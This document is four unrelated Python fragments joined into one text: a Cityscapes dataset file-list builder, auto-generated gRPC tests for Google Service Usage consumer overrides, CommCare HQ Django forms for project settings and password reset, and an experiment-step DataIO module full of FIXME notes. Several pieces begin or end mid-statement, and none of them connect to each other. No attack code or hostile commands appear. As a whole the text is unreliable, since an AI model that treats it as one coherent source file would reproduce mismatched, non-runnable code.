**kwargs): super().__init__(*args, **kwargs) def create_json_from_list(self, json_list, stereo_replace): """Creates a dictionary in the format of the basic_files.json. Takes a dictionary with the dataset-specific names and file endings and fills the dictionary self.json_dict with the entries from the dataset folder based on the information in the given dictionary. :param json_list: dataset-spicific dictionary of the form {'names: [list of all data categories that this dataset provides, e.g. 'color', 'depth', ...], 'types': [list of the corresponding file types, e.g. '.png', '.txt', ...], 'filters': [list of the corresponding filters to identify the folders for each name, e.g. 'camera', ...]} :param stereo_replace: dicionary that defines the strings that have to be interchanged in order to get the right stereo image from the left stereo image: {left_image_string: right_image_string} """ # string sequences from corrupted files that should be ignored ignore_extra = ['troisdorf_000000_000073'] ignore_video_left = ['frankfurt_000000_006434', 'frankfurt_000001_023592', 'frankfurt_000001_038767'] ignore_video_right = ['frankfurt_000000_022587', 'frankfurt_000001_026781', 'frankfurt_000001_059933', 'frankfurt_000001_059934', 'frankfurt_000001_060157', 'frankfurt_000001_070159', 'frankfurt_000001_083533'] ignore_list = ignore_extra + ignore_video_left + ignore_video_right folders_list = [] file_list = [] position_list = [] numerical_list = [] main_files = [] for i, name, type, filter in zip(range(len(json_list['names'])), json_list['names'], json_list['types'], json_list['filters']): # cityscapes_extra dataset if 'gtCoarse' in filter: filter.append('train_extra') folders, files = self.create_filelist(filter, type, ignore=ignore_list) if 'segmentation' in name: files = [f for f in files if 'color' not in f and 'instance' not in f] folders_list.append(folders)
the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_consumer_override), '__call__') as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( operations_pb2.Operation(name='operations/spam') ) response = await client.create_consumer_override(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == serviceusage.CreateConsumerOverrideRequest() # Establish that the response is the type that we expect. assert isinstance(response, future.Future) @pytest.mark.asyncio async def test_create_consumer_override_async_from_dict(): await test_create_consumer_override_async(request_type=dict) def test_create_consumer_override_field_headers(): client = ServiceUsageClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = serviceusage.CreateConsumerOverrideRequest() request.parent = 'parent/value' # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_consumer_override), '__call__') as call: call.return_value = operations_pb2.Operation(name='operations/op') client.create_consumer_override(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( 'x-goog-request-params', 'parent=parent/value', ) in kw['metadata'] @pytest.mark.asyncio async def test_create_consumer_override_field_headers_async(): client = ServiceUsageAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = serviceusage.CreateConsumerOverrideRequest() request.parent = 'parent/value' # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_consumer_override), '__call__') as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(operations_pb2.Operation(name='operations/op')) await client.create_consumer_override(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( 'x-goog-request-params', 'parent=parent/value', ) in kw['metadata'] def test_update_consumer_override(transport: str = 'grpc', request_type=serviceusage.UpdateConsumerOverrideRequest): client = ServiceUsageClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_consumer_override), '__call__') as call: # Designate an appropriate return value for the call. call.return_value = operations_pb2.Operation(name='operations/spam') response = client.update_consumer_override(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == serviceusage.UpdateConsumerOverrideRequest() # Establish that the response is the type that we expect. assert isinstance(response, future.Future) def test_update_consumer_override_from_dict(): test_update_consumer_override(request_type=dict) def test_update_consumer_override_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = ServiceUsageClient( credentials=ga_credentials.AnonymousCredentials(), transport='grpc', ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_consumer_override), '__call__') as call: client.update_consumer_override() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == serviceusage.UpdateConsumerOverrideRequest() @pytest.mark.asyncio async def test_update_consumer_override_async(transport: str = 'grpc_asyncio', request_type=serviceusage.UpdateConsumerOverrideRequest): client = ServiceUsageAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_consumer_override), '__call__') as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( operations_pb2.Operation(name='operations/spam') ) response = await client.update_consumer_override(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == serviceusage.UpdateConsumerOverrideRequest() # Establish that the response is the type that we expect. assert isinstance(response, future.Future) @pytest.mark.asyncio async def test_update_consumer_override_async_from_dict(): await test_update_consumer_override_async(request_type=dict) def test_update_consumer_override_field_headers(): client = ServiceUsageClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = serviceusage.UpdateConsumerOverrideRequest() request.name = 'name/value' # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_consumer_override), '__call__') as call: call.return_value = operations_pb2.Operation(name='operations/op') client.update_consumer_override(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( 'x-goog-request-params', 'name=name/value', ) in kw['metadata'] @pytest.mark.asyncio async def test_update_consumer_override_field_headers_async(): client = ServiceUsageAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = serviceusage.UpdateConsumerOverrideRequest() request.name = 'name/value' # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_consumer_override), '__call__') as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(operations_pb2.Operation(name='operations/op')) await client.update_consumer_override(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( 'x-goog-request-params', 'name=name/value', ) in kw['metadata'] def test_delete_consumer_override(transport: str = 'grpc', request_type=serviceusage.DeleteConsumerOverrideRequest): client = ServiceUsageClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_consumer_override), '__call__') as call: # Designate an appropriate return value for the call. call.return_value = operations_pb2.Operation(name='operations/spam') response = client.delete_consumer_override(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == serviceusage.DeleteConsumerOverrideRequest() # Establish that the response is the type that we expect. assert isinstance(response, future.Future) def test_delete_consumer_override_from_dict(): test_delete_consumer_override(request_type=dict) def test_delete_consumer_override_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = ServiceUsageClient( credentials=ga_credentials.AnonymousCredentials(), transport='grpc', ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_consumer_override), '__call__') as call: client.delete_consumer_override() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == serviceusage.DeleteConsumerOverrideRequest() @pytest.mark.asyncio async def test_delete_consumer_override_async(transport: str = 'grpc_asyncio', request_type=serviceusage.DeleteConsumerOverrideRequest): client = ServiceUsageAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_consumer_override), '__call__') as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( operations_pb2.Operation(name='operations/spam') ) response = await client.delete_consumer_override(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == serviceusage.DeleteConsumerOverrideRequest() # Establish that the response is the type that we expect. assert isinstance(response, future.Future) @pytest.mark.asyncio async def test_delete_consumer_override_async_from_dict(): await test_delete_consumer_override_async(request_type=dict) def test_delete_consumer_override_field_headers(): client = ServiceUsageClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = serviceusage.DeleteConsumerOverrideRequest() request.name = 'name/value' # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_consumer_override), '__call__') as call: call.return_value = operations_pb2.Operation(name='operations/op') client.delete_consumer_override(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( 'x-goog-request-params', 'name=name/value', ) in kw['metadata'] @pytest.mark.asyncio async def test_delete_consumer_override_field_headers_async(): client = ServiceUsageAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = serviceusage.DeleteConsumerOverrideRequest() request.name = 'name/value' # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_consumer_override), '__call__') as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(operations_pb2.Operation(name='operations/op')) await client.delete_consumer_override(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( 'x-goog-request-params', 'name=name/value', ) in kw['metadata'] def test_list_consumer_overrides(transport: str
"Unusual workflows or design decisions for others to watch out for." ), ) training_materials = CharField( label="Training materials", required=False, help_text=( "Where to find training materials or other relevant resources." ), ) partner_comments = CharField( label="Partner Comments", widget=forms.Textarea, required=False, help_text=( "past or anticipated problems with this partner." ), ) partner_contact = CharField( label="Partner contact", required=False, help_text=( "Primary partner point of contact going forward (type username of existing web user)." ), ) dimagi_contact = CharField( label="Dimagi contact", required=False, help_text=( "Primary Dimagi point of contact going forward (type username of existing web user)." ), ) send_handoff_email = forms.BooleanField( label="Send Hand-off Email", required=False, help_text=( "Check this box to trigger a hand-off email to the partner when this form is submitted." ), ) use_custom_auto_case_update_hour = forms.ChoiceField( label=ugettext_lazy("Choose specific time for custom auto case update rules to run"), required=True, choices=( ('N', ugettext_lazy("No")), ('Y', ugettext_lazy("Yes")), ), ) auto_case_update_hour = forms.IntegerField( label=ugettext_lazy("Hour of the day, in UTC, for rules to run (0-23)"), required=False, min_value=0, max_value=23, ) use_custom_auto_case_update_limit = forms.ChoiceField( label=ugettext_lazy("Set custom auto case update rule limits"), required=True, choices=( ('N', ugettext_lazy("No")), ('Y', ugettext_lazy("Yes")), ), ) auto_case_update_limit = forms.IntegerField( label=ugettext_lazy("Max allowed updates in a daily run"), required=False, min_value=1000, ) use_custom_odata_feed_limit = forms.ChoiceField( label=ugettext_lazy("Set custom OData Feed Limit? Default is {}.").format( settings.DEFAULT_ODATA_FEED_LIMIT), required=True, choices=( ('N', ugettext_lazy("No")), ('Y', ugettext_lazy("Yes")), ), ) odata_feed_limit = forms.IntegerField( label=ugettext_lazy("Max allowed OData Feeds"), required=False, min_value=1, ) granted_messaging_access = forms.BooleanField( label="Enable Messaging", required=False, help_text="Check this box to enable messaging.", # TODO through non-test gateways ) def __init__(self, domain, can_edit_eula, *args, **kwargs): super(DomainInternalForm, self).__init__(*args, **kwargs) self.domain = domain self.can_edit_eula = can_edit_eula additional_fields = [] if self.can_edit_eula: additional_fields = ['custom_eula', 'can_use_data'] self.fields['custom_eula'] = ChoiceField( label="Custom Eula?", choices=tf_choices(_('Yes'), _('No')), required=False, help_text='Set to "yes" if this project has a customized EULA as per their contract.' ) self.fields['can_use_data'] = ChoiceField( label="Can use project data?", choices=tf_choices('Yes', 'No'), required=False, help_text='Set to "no" if this project opts out of data usage. Defaults to "yes".' ) self.helper = hqcrispy.HQFormHelper() self.helper.layout = crispy.Layout( crispy.Fieldset( _("Basic Information"), 'initiative', 'workshop_region', 'self_started', 'is_test', 'area', 'sub_area', 'organization_name', 'notes', 'phone_model', 'business_unit', 'countries', 'commtrack_domain', 'performance_threshold', 'experienced_threshold', 'amplifies_workers', 'amplifies_project', 'data_access_threshold', crispy.Div(*additional_fields), ), crispy.Fieldset( _("Support Hand-off information"), 'partner_technical_competency', 'support_prioritization', 'gs_continued_involvement', 'technical_complexity', 'app_design_comments', 'training_materials', 'partner_comments', 'partner_contact', 'send_handoff_email', 'dimagi_contact', ), crispy.Fieldset( _("Project Limits"), crispy.Field( 'use_custom_auto_case_update_limit', data_bind='value: use_custom_auto_case_update_limit', ), crispy.Div( crispy.Field('auto_case_update_limit'), data_bind="visible: use_custom_auto_case_update_limit() === 'Y'", ), crispy.Field( 'use_custom_auto_case_update_hour', data_bind='value: use_custom_auto_case_update_hour', ), crispy.Div( crispy.Field('auto_case_update_hour'), data_bind="visible: use_custom_auto_case_update_hour() === 'Y'", ), crispy.Field( 'use_custom_odata_feed_limit', data_bind="value: use_custom_odata_feed_limit", ), crispy.Div( crispy.Field('odata_feed_limit'), data_bind="visible: use_custom_odata_feed_limit() === 'Y'", ), 'granted_messaging_access', ), crispy.Fieldset( _("Salesforce Details"), 'sf_contract_id', 'sf_account_id', ), hqcrispy.FormActions( StrictButton( _("Update Project Information"), type="submit", css_class='btn-primary', ), ), ) @property def current_values(self): return { 'use_custom_auto_case_update_hour': self['use_custom_auto_case_update_hour'].value(), 'use_custom_auto_case_update_limit': self['use_custom_auto_case_update_limit'].value(), 'use_custom_odata_feed_limit': self['use_custom_odata_feed_limit'].value() } def _get_user_or_fail(self, field): username = self.cleaned_data[field] if not username: return None user = WebUser.get_by_username(username) if not user: msg = "Web user with username '{username}' does not exist" self.add_error(field, msg.format(username=username)) elif not user.is_member_of(self.domain): msg = "'{username}' is not the username of a web user in '{domain}'" self.add_error(field, msg.format(username=username, domain=self.domain)) return user def clean_auto_case_update_hour(self): if self.cleaned_data.get('use_custom_auto_case_update_hour') != 'Y': return None value = self.cleaned_data.get('auto_case_update_hour') if not value: raise forms.ValidationError(_("This field is required")) return value def clean_auto_case_update_limit(self): if self.cleaned_data.get('use_custom_auto_case_update_limit') != 'Y': return None value = self.cleaned_data.get('auto_case_update_limit') if not value: raise forms.ValidationError(_("This field is required")) return value def clean_odata_feed_limit(self): if self.cleaned_data.get('use_custom_odata_feed_limit') != 'Y': return None value = self.cleaned_data.get('odata_feed_limit') if not value: raise forms.ValidationError(_("Please specify a limit for OData feeds.")) return value def clean(self): send_handoff_email = self.cleaned_data['send_handoff_email'] partner_user = self._get_user_or_fail('partner_contact') if not partner_user and send_handoff_email: msg = "You can't send a hand-off email without specifying a partner contact." self.add_error('partner_contact', msg) dimagi_user = self._get_user_or_fail('dimagi_contact') if send_handoff_email and not dimagi_user: msg = "You can't send a hand-off email without specifying a contact at dimagi." self.add_error('dimagi_contact', msg) elif send_handoff_email and not dimagi_user.full_name: msg = ("The dimagi user '{}' does not have a name configured, please" "go to your account settings and add a name before attempting " "to send an email to the partner.").format(dimagi_user.username) self.add_error('dimagi_contact', msg) def save(self, domain): kwargs = { "workshop_region": self.cleaned_data["workshop_region"] } if self.cleaned_data["workshop_region"] else {} if self.can_edit_eula: kwargs['custom_eula'] = self.cleaned_data['custom_eula'] == 'true' kwargs['can_use_data'] = self.cleaned_data['can_use_data'] == 'true' domain.update_deployment( countries=self.cleaned_data['countries'], ) domain.is_test = self.cleaned_data['is_test'] domain.auto_case_update_hour = self.cleaned_data['auto_case_update_hour'] domain.auto_case_update_limit = self.cleaned_data['auto_case_update_limit'] domain.odata_feed_limit = self.cleaned_data['odata_feed_limit'] domain.granted_messaging_access = self.cleaned_data['granted_messaging_access'] domain.update_internal( sf_contract_id=self.cleaned_data['sf_contract_id'], sf_account_id=self.cleaned_data['sf_account_id'], initiative=self.cleaned_data['initiative'], self_started=self.cleaned_data['self_started'] == 'true', area=self.cleaned_data['area'], sub_area=self.cleaned_data['sub_area'], organization_name=self.cleaned_data['organization_name'], notes=self.cleaned_data['notes'], phone_model=self.cleaned_data['phone_model'], commtrack_domain=self.cleaned_data['commtrack_domain'] == 'true', performance_threshold=self.cleaned_data['performance_threshold'], experienced_threshold=self.cleaned_data['experienced_threshold'], amplifies_workers=self.cleaned_data['amplifies_workers'], amplifies_project=self.cleaned_data['amplifies_project'], business_unit=self.cleaned_data['business_unit'], data_access_threshold=self.cleaned_data['data_access_threshold'], partner_technical_competency=self.cleaned_data['partner_technical_competency'], support_prioritization=self.cleaned_data['support_prioritization'], gs_continued_involvement=self.cleaned_data['gs_continued_involvement'], technical_complexity=self.cleaned_data['technical_complexity'], app_design_comments=self.cleaned_data['app_design_comments'], training_materials=self.cleaned_data['training_materials'], partner_comments=self.cleaned_data['partner_comments'], partner_contact=self.cleaned_data['partner_contact'], dimagi_contact=self.cleaned_data['dimagi_contact'], **kwargs ) def clean_password(txt): if has_custom_clean_password(): message = custom_clean_password(txt) else: message = _clean_password(txt) if message: raise forms.ValidationError(message) return txt def _clean_password(txt): strength = zxcvbn(txt, user_inputs=['commcare', 'hq', 'dimagi', 'commcarehq']) if strength['score'] < 2: return _('Password is not strong enough. Try making your password more complex.') class NoAutocompleteMixin(object): def __init__(self, *args, **kwargs): super(NoAutocompleteMixin, self).__init__(*args, **kwargs) if settings.DISABLE_AUTOCOMPLETE_ON_SENSITIVE_FORMS: for field in self.fields.values(): field.widget.attrs.update({'autocomplete': 'off'}) class HQPasswordResetForm(NoAutocompleteMixin, forms.Form): """ Only finds users and emails forms where the USERNAME is equal to the email specified (preventing Mobile Workers from using this form to submit). This small change is why we can't use the default PasswordReset form. """ email = forms.EmailField(label=ugettext_lazy("Email"), max_length=254, widget=forms.TextInput(attrs={'class': 'form-control'})) if settings.ADD_CAPTCHA_FIELD_TO_FORMS: captcha = CaptchaField(label=ugettext_lazy("Type the letters in the box")) error_messages = { 'unknown': ugettext_lazy("That email address doesn't have an associated user account. Are you sure you've " "registered?"), 'unusable': ugettext_lazy("The user account associated with this email address cannot reset the " "password."), } def clean_email(self): UserModel = get_user_model() email = self.cleaned_data["email"] matching_users = UserModel._default_manager.filter(username__iexact=email) # below here is not modified from the superclass if not len(matching_users): raise forms.ValidationError(self.error_messages['unknown']) if not any(user.is_active for user in matching_users): # none of the filtered users are active raise forms.ValidationError(self.error_messages['unknown']) if any((user.password == UNUSABLE_PASSWORD_PREFIX) for user in matching_users): raise forms.ValidationError(self.error_messages['unusable']) return email def save(self, domain_override=None, subject_template_name='registration/password_reset_subject.txt', email_template_name='registration/password_reset_email.html', # WARNING: Django 1.7 passes this in automatically. do not remove html_email_template_name=None, use_https=False, token_generator=default_token_generator, from_email=None, request=None, **kwargs): """ Generates a one-use only link for resetting password and sends to the user. """ if settings.IS_SAAS_ENVIRONMENT: subject_template_name = 'registration/email/password_reset_subject_hq.txt' email_template_name = 'registration/email/password_reset_email_hq.html' email = self.cleaned_data["email"] # this is the line that we couldn't easily override in PasswordForm where # we specifically filter for the username, not the email, so that # mobile workers who have the same email set as a web worker don't # get a password reset email. active_users = get_active_users_by_email(email) # the code below is copied from default PasswordForm for user in active_users: # Make sure that no email is sent to a user that actually has # a password marked as unusable if not user.has_usable_password(): continue if not domain_override: current_site = get_current_site(request) site_name = current_site.name domain = current_site.domain else: site_name = domain = domain_override couch_user = CouchUser.from_django_user(user) if not couch_user: continue if couch_user.is_web_user(): user_email = user.username elif user.email: user_email = user.email else: continue c = { 'email': user_email, 'domain': domain, 'site_name': site_name, 'uid': urlsafe_base64_encode(force_bytes(user.pk)), 'user': user, 'token': token_generator.make_token(user), 'protocol': 'https' if use_https else 'http', } subject = render_to_string(subject_template_name, c) # Email subject *must not* contain newlines subject = ''.join(subject.splitlines()) message_plaintext = render_to_string('registration/password_reset_email.html', c) message_html = render_to_string(email_template_name, c) send_html_email_async.delay( subject, user_email, message_html, text_content=message_plaintext, email_from=settings.DEFAULT_FROM_EMAIL ) class ConfidentialPasswordResetForm(HQPasswordResetForm): def clean_email(self): try: return super(ConfidentialPasswordResetForm, self).clean_email() except forms.ValidationError: # The base class throws various emails that give away information about the user; # we can pretend all is well since the save() method is safe for missing users. return self.cleaned_data['email'] class HQSetPasswordForm(SetPasswordForm): new_password1 = forms.CharField(label=ugettext_lazy("New password"), widget=forms.PasswordInput( attrs={'data-bind': "value: password, valueUpdate: 'input'"}), help_text=mark_safe(""" <span data-bind="text: passwordHelp, css: color"> """)) def save(self, commit=True): user = super(HQSetPasswordForm, self).save(commit) couch_user = CouchUser.from_django_user(user) couch_user.last_password_set = datetime.datetime.utcnow() if commit: couch_user.save() return user class EditBillingAccountInfoForm(forms.ModelForm): email_list = forms.CharField( label=BillingContactInfo._meta.get_field('email_list').verbose_name, help_text=BillingContactInfo._meta.get_field('email_list').help_text, widget=forms.SelectMultiple(choices=[]), ) class Meta(object): model = BillingContactInfo fields = ['first_name', 'last_name', 'phone_number', 'company_name', 'first_line', 'second_line', 'city', 'state_province_region', 'postal_code', 'country'] widgets = {'country': forms.Select(choices=[])} def __init__(self, account, domain, creating_user, data=None, *args, **kwargs): self.account = account self.domain = domain self.creating_user = creating_user is_ops_user = kwargs.pop('is_ops_user', False) try: self.current_country = self.account.billingcontactinfo.country except Exception: initial = kwargs.get('initial') self.current_country = initial.get('country') if initial is not None else None try: kwargs['instance'] = self.account.billingcontactinfo kwargs['initial'] = { 'email_list': self.account.billingcontactinfo.email_list, }
<reponame>tgbugs/mlab #TODO FIXME there are three things that are trying to go on here #1) easy way to create the steps of an experiment #2) easy way to create the datasources for an experiment #3) bind the result to an object #compatability between the three breaks down when: #the datasource specified by 2 is not 1:1 with the result generated by the step 1 #put another way: if the object generated by 1 is not what we want to bind in 3 #because we want to bind a sub component of 3 #eg multiple df placeholders, the datafile and record datafile #FIXME fuck, it is rather obvious that steps have substeps... but this could be hard to persist? #FIXME also, datasources really do need to be reused... #TODO the step object in the database... should link... datasources, analysis, etc to the object... but that is already done... #it is hard to understand the logic of a list of measurements and analysis especially if something like a sanity check is not annotated as such #it would depend on the name given to the object... #FIXME ALL STEPS, EVEN THE MOST BASIC, ARE DATASORUCES, booleans saying 'this step is done!' based on the class name of the step class BaseDataIO: """ Base class for all experiment steps This should be extended for each type of step Step types should then be extended once more To define individual records/steps :attr::class:`.MappedClass` should appear in local namespace via `from database.models import ModelName as MappedClass`. These classes are things that ususally will not need to be queried within the scope of datacollection. :attr::string:`.ctrl_name` :attr::list:`.prereqList` :param: Controller, a class instance w/ function that can return floats, Controller.__class__.__name__ must match ctrl_name :param: session, a sqlalchemy database session that (hopefully) has tables matching your mapped classes :meth:`.Persist` :meth:`.do` retunrs self.value """ #FIXME could make a factory function that takes the class variables and returns the class... #the only issue is writeTarget can't be checked before hand :/ MappedClass=None #from database.models import thing as MappedClass mappedClassPropertiesDict={} #things required by the database, eg datasource units ctrl_name=None @property def name(self): #FIXME add a way to explicity name classes if you want? return self.__class__.__name__[4:] def __init__(self,Controller,session): #FIXME controller could also be a MappedInstance? if Controller.__class__.__name__==self.ctrl_name: self.controller_version=Controller.version #FIXME hash the file or something for external stuff #BIGGER FIXME doccumenting which version of the controller was used is now VITAL if not self.controller_version: raise AttributeError('What are you doing not keeping track of' ' what software you used! BAD SCIENTIST') self.ctrl=Controller else: raise TypeError('Wrong controller for this step!') self.session=session try: self.MappedInstance=self.session.query(MappedClass).filter_by(name=self.name).one() except NoResultFound: self.Persist() def checkVersion(self,thing,strict=False): #validate that the code has not changed #TODO this should be handled at the level of the experiment #hash the code of the thing #FIXME should this all be here or should it be tracked globally on startup? if strict: #hash the file that it came from and compare it to the previous hash pass def Persist(self): """ Returns None Creates an instance of :class:`.MappedClass` according to other defined params, assigns it to :instance:`.MappedInstance` and commits it to the database. """ raise NotImplementedError('You MUST implement this at the subclass level') def do(self): raise NotImplementedError('You MUST implement this at the subclass level') class DataIO(BaseDataIO): #IXCK ugly ugly might be nice for a factory :/ but is poorly constrained @do, so slow #NOTE TO SELF: this interface needs to be here unless we go with STI for dataio objects in order to implement persistence, and EVEN THAT misses the point which is that there are live functions that we want to run and have doccumented, I supposed using only names it would be possible to init everything and save it BUT we would still need something to deal with actually tying it all together at run time which is what THIS is supposed to do #doing it this way we keep the all the relevant information in one place that can all be seen at the same time and debugged more easily #the alternative is generating DataIO objects directly from database entries but that still leaves tying them to actual live code objects which seems like it could go very wrong and would still require an input interface and we would essentially be persisting a class that looks like this anyway #probably do want a way to recreate classes straight from the database though... but that is alot of work and we will have to do it in the future NOT RIGHT NOW MappedClass=None #from database.models import thing as MappedClass mcKwargs={} # MappedClass(**kwargs) things for the database, eg datasource units ctrl_name=None #FIXME why do we need this again??? ANSWER: because we need live functions and I'm not sure the best way to unambigiously name a 'dead' function of a class and make it live (the way in rigcont is iffy) getter_name=None #name of the function used to get stuff writer_name=None #eg getattr(writeTarget,self.writer_name) collection_name=None #eg metadata_ or something setter_name=None #FIXME the name of the setting function check_function=None #FIXME checks are ONLY going to be written to experiments, so we can pull them out to steps? or even make them their own step akin to analysis? yeah, because checks often need to occur across multiple steps and longer stretches of time analysis_function=None #FIXME probably should be a from xyz import thing as function def __init__(self,Controller,session): super().__init__(Controller,session) if getter_name: self.getter=getattr(self.ctrl,self.getter_name) #FIXME allow override if setter_name: self.setter=getattr(self.ctrl,self.setter_name) #TODO version checks def Persist(self): #self.MappedInstance=MappedClass(name=self.name,prefix=self.prefix,unit=self.unit,mantissa=self.mantissa,hardware_id=hardware_id) self.MappedInstance=MappedClass(**self.mcKwargs) self.session.add(self.MappedInstance) self.session.commit() def setValue(self,set_value,error=0): #both value and expected value will be recoreded somehow... self.expected_value=set_value self.ev_error=error #allowed error self.setter(self.expected_value) def getValue(self,analysis_value=None): self.value=analysis_value #FIXME how do we link this to the output... if not self.value: self.value=self.getter() def checkValue(self): #FIXME making check steps similar to analysis simplifies saving results self.check_function() def analysis(self): #FIXME need version control here... :/ so it is possible to track down errors self.value=self.analysis_function(self.value) def writeValue(self,writeTarget,autocommit=False): collection=getattr(writeTarget,self.collection_name) writer=getattr(writeTarget,self.writer_name) collection.append(writer(MappedInstance,self.value)) #FIXME this gives some insight into array formats if autocommit: self.session.commit() def do(self,writeTarget=None,set_value=None,set_error=0,analysis_value=None,autocommit=False): if set_value: #FIXME handle lack of setter_name? self.setValue(set_value,set_error) #TODO make sure that this will block properly if analysis_value: self.getValue(analysis_value) else: self.getValue() if self.analysis_function: self.analysis() #FIXME how to check these... if writeTarget: self.writeValue(writeTarget,autocommit) if self.check_function: self.checkValue() #check post write and THEN raise so that the bad value is recorded return self.value class Get(BaseDataIO): #MappedClass=None #GET DOESNT NEED THIS??!?! ctrl_name=None getter_name=None #name of the function used to get stuff def __init__(self,Controller,session): super().__init__(Controller,session) if getter_name: self.getter=getattr(self.ctrl,self.getter_name) #FIXME allow override def getValue(self): self.value=self.getter() def do(self): self.getValue() return self.value class GetWrite(Get): MappedClass=None #from database.models import thing as MappedClass ctrl_name=None getter_name=None #name of the function used to get stuff writer_name=None #eg getattr(writeTarget,self.writer_name) collection_name=None #eg metadata_ or something def writeValue(self,writeTarget,autocommit=False): collection=getattr(writeTarget,self.collection_name) writer=getattr(writeTarget,self.writer_name) collection.append(writer(MappedInstance,self.value)) #FIXME this gives some insight into array formats if autocommit: self.session.commit() def do(self,writeTarget): self.getValue() self.writeValue(writeTarget) return self.value class SetGetWriteCheck(GetWrite): #this is the basis for following protocols... eg print and input MappedClass=None #from database.models import thing as MappedClass ctrl_name=None getter_name=None #name of the function used to get stuff writer_name=None #eg getattr(writeTarget,self.writer_name) collection_name=None #eg metadata_ or something setter_name=None #FIXME the name of the setting function def __init__(self,Controller,session): super().__init__(Controller,session) if setter_name: self.setter=getattr(self.ctrl,self.setter_name) def setValue(self,set_value,error=0): #both value and expected value will be recoreded somehow... self.expected_value=set_value self.ev_error=error #allowed error self.setter(self.expected_value) def checkValue(self): raise NotImplementedError('You MUST implement this at the subclass level') def do(self,writeTarget,set_value): self.setValue(set_value) #TODO make sure that this will block properly super().do(writeTarget) #FIXME this needs to write value AND expected_value self.checkValue() #check post write and THEN raise so that the bad value is recorded return self.value class Analysis(Get): #mostly for online stuff that won't be persisted which is really very few things MappedClass=None #from database.models import thing as MappedClass ctrl_name=None getter_name=None #name of the function used to get stuff analysis_function=None #FIXME probably should be a from xyz import thing as function def getValue(self,analysis_value=None): self.value=analysis_value #FIXME how do we link this to the output... if not self.value: super().getValue() #FIXME make sure this sets self.value correctly def analysis(self): self.value=self.analysis_function(self.value)
